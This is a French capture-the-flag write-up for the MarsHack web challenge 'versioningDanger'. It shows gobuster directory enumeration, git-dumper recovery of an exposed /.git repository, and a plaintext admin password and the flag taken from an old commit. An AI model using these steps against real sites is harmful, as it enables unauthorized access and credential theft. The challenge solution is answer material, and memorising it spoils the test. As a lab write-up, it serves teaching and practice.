# Write up web/versioningDanger

## Consigne :

```
Global Information Tracker : L'heure partout dans le monde ...
Mais dites-vous que Linus est un génie...
Prenez possession du site !
```

## Pièce jointe :
```

```

## Serveur :

```
Docker

game1.marshack.fr:30001
```

## Points attribués :

```
20
```

## Hint :

```
(G)lobal (I)nformation (T)racker !
```

## Flag :

```
`fl@g{4b0d98eed3de37eb75d763b0ba1f32cf}`
```

## Créateur :

```
Taz
```


## Description général du challenge :

```
Le but de ce challenge est de retrouver le mot de passe de l'administrateur.

Un petit gobuster permet de retrouver le répertoire d'administration : /sysadmin ainsi qu'un dépot /.git
Une fenètre de connexion apparait mais nous n'avons pas les credentials...

Selon la wordlist utilisée, le répertoire .git apparait ... ou pas...
Mais l'intitulé de l'exercice est "Global Information Tracker" et "Linus est une génie".
Une recherche Google donne l'information : Git a été développé par Linus Torvald.

Une recherche à la racine du site permet de découvrir un répertoire "/.git"
En downloadant la totalité du répertoire, on a accès à tout le dépot Git du site.
Dans l'historique, on trouve un fix "Correction du controle du mot de passe"
En affichant les détails du commit, on trouve le user / password en clair

```

## Soluce :
```
john.doe@marshack: gobuster dir -u http://127.0.0.1/web/versioningDanger_Challenge -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://127.0.0.1
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/04/14 22:09:00 Starting gobuster in directory enumeration mode
===============================================================
/.git/HEAD            (Status: 200) [Size: 23]
/.htaccess            (Status: 403) [Size: 274]
/css                  (Status: 301) [Size: 304] [--> http://127.0.0.1/css/]
/img                  (Status: 301) [Size: 304] [--> http://127.0.0.1/img/]
/js                   (Status: 301) [Size: 303] [--> http://127.0.0.1/js/] 
/index.php            (Status: 200) [Size: 191098]                         
/sysadmin             (Status: 301) [Size: 309] [--> http://127.0.0.1/sysadmin/]
                                                                                
===============================================================
2022/04/14 22:09:01 Finished
===============================================================

La page /sysadmin affiche une fenetre de login avec utilisateur / mot de passe que nous n'avons pas

Deux choix :
- La wordlist choisie a trouvé le lien .git/HEAD à la racine du site
- Sinon, une recherche sur Internet de "Global Information Tracker" permet de savoir que c'est un acronyme de Git le célébre outil de versionning. Un test de .git à la racine du site renvoit un 403. L'URL existe !

Dans les deux cas, la page est forbidden. Il s'agit bien d'un dépot Git.

Il existe plusieurs outils qui permettent de reconstituer un dépot Git à partir des fichiers connus.

john.doe@marshack: git clone https://github.com/arthaud/git-dumper
john.doe@marshack: cd git-dumper/
john.doe@marshack: pip install -r requirements.txt
john.doe@marshack: python git_dumper.py http://127.0.0.1/.git ./la_repo_copiee
[-] Testing http://127.0.0.1/.git/HEAD [200]
[-] Testing http://127.0.0.1/.git/ [403]
[-] Fetching common files

...

[-] Fetching http://127.0.0.1/.git/objects/0a/5fd3ec2a840af22ed3379592fc6e5dd1bc9802 [200]
[-] Fetching http://127.0.0.1/.git/objects/f4/59d2948179eb56e6b38c1431521adb503f2198 [200]
[-] Running git checkout .

john.doe@marshack: cd la_repo_copiee
john.doe@marshack: git log

commit 335a48c339473fdc64254b517914199c3d8702f4 (HEAD -> master)
Author: John Doe Jr <john.doe@marshack.fr>
Date:   Thu Apr 14 21:39:21 2022 +0200

    Site fonctionnel

commit ee44073e83a058020108e1026580f5b70e59f896
Author: John Doe Jr <john.doe@marshack.fr>
Date:   Thu Apr 14 21:38:39 2022 +0200

    Correction du CSS

commit 67c6640f06fa585e5f028c9c63662003eee851fb
Author: John Doe Jr <john.doe@marshack.fr>
Date:   Thu Apr 14 21:35:02 2022 +0200

    Mise en place du javascript 2 !

commit ce4f7cea398b3097450292a65c5a90552cbc9420
Author: John Doe Jr <john.doe@marshack.fr>
Date:   Thu Apr 14 21:34:32 2022 +0200

    Mise en place du javascript

commit 6c4cc1bec0ab49a871b5599dce56aa29d443fc84
Author: John Doe Jr <john.doe@marshack.fr>
Date:   Thu Apr 14 21:27:32 2022 +0200

    Correction du controle du mot de passe

commit 190c436cd3add787da4f0fde726eb553b3fa4a7a
Author: John Doe Jr <john.doe@marshack.fr>
Date:   Thu Apr 14 21:24:39 2022 +0200

    Creation de la carte

commit c7f3e8b30bd1a88bde70d3943190a2724742baa9
Author: John Doe Jr <john.doe@marshack.fr>
Date:   Thu Apr 14 20:49:11 2022 +0200

    Correction du bug des liens

commit abfcfdda30271fffd5b1065c72bd09cd1ca2f7f8
Author: John Doe Jr <john.doe@marshack.fr>
Date:   Thu Apr 14 20:47:06 2022 +0200

    Mise en place de la partie administrateur

commit 4c306ad33cfe74a2f96cf80345b197b900fb10c8
Author: John Doe Jr <john.doe@marshack.fr>
Date:   Thu Apr 14 20:43:42 2022 +0200

    Mise en place du CSS

commit c39a4376be4e26099a1ffb2ca60f18d545fc9a7a
Author: John Doe Jr <john.doe@marshack.fr>
Date:   Thu Apr 14 20:40:36 2022 +0200

    Base du site

commit ac47235e371b3ce9b8212210619b28e0255dc27e
Author: John Doe Jr <john.doe@marshack.fr>
Date:   Thu Apr 14 20:15:55 2022 +0200

    Initialisation du dépot


Un commit est intéressant : 6c4cc1bec0ab49a871b5599dce56aa29d443fc84 ==> Correction du controle du mot de passe

john.doe@marshack: git show 6c4cc1bec0ab49a871b5599dce56aa29d443fc84
commit 6c4cc1bec0ab49a871b5599dce56aa29d443fc84
Author: John Doe Jr <john.doe@marshack.fr>
Date:   Thu Apr 14 21:27:32 2022 +0200

    Correction du controle du mot de passe

diff --git a/sysadmin/index.php b/sysadmin/index.php
index 0a5fd3e..e983544 100755
--- a/sysadmin/index.php
+++ b/sysadmin/index.php
@@ -5,14 +5,14 @@ include_once "flag.php";
 @$sPassword = ( isset($_POST['sPassword']) ? $_POST['sPassword'] : '' );
 
 $sAdminUser = "john.doe@marshack.fr";
-$sAdminPassword = "WhatARobustP@ssW0rd!!";
+$sAdminPassword = "a30256885999c2aa6fae6e3c3202d771";
 
 $sMessage = "";
 
 if ( $sUser && $sPassword )
 {
 
-   if  ( $sAdminPassword != $sPassword || $sAdminUser != $sUser )
+   if  ( $sAdminPassword != md5($sPassword) || $sAdminUser != $sUser )
    {
       $sMessage = '<div class="alert alert-danger" role="alert">Connexion refusée</div>';
    }
@@ -33,7 +33,7 @@ if ( $sUser && $sPassword )
   </head>
   <body>
     <nav class="navbar navbar-expand-md navbar-ligth fixed-top bg-ligth">
-      <a class="navbar-brand" href="/"><font style="color:red">&lt;&nbsp;</font>Mars@Hack<font style="color:red">&nbsp;/&gt;</font></a>
+      <a class="navbar-brand" href="#"><font style="color:red">&lt;&nbsp;</font>Mars@Hack<font style="color:red">&nbsp;/&gt;</font></a>
       <div class="collapse navbar-collapse" id="navbarSupportedContent">
           <ul class="navbar-nav mr-auto">
               <li class="nav-item "><a class="nav-link" href="/index.php">Accueil</a></li>
@@ -79,4 +79,4 @@ if ( $sUser && $sPassword )
       </div>
     </div>
   </body>
-</html>
+</html>
\ No newline at end of file


On se connecte sur le site avec :
- john.doe@marshack.fr
- WhatARobustP@ssW0rd!!

Bien joué le flag est : 4b0d98eed3de37eb75d763b0ba1f32cf

```

<!-- Ok F : 20220422 -->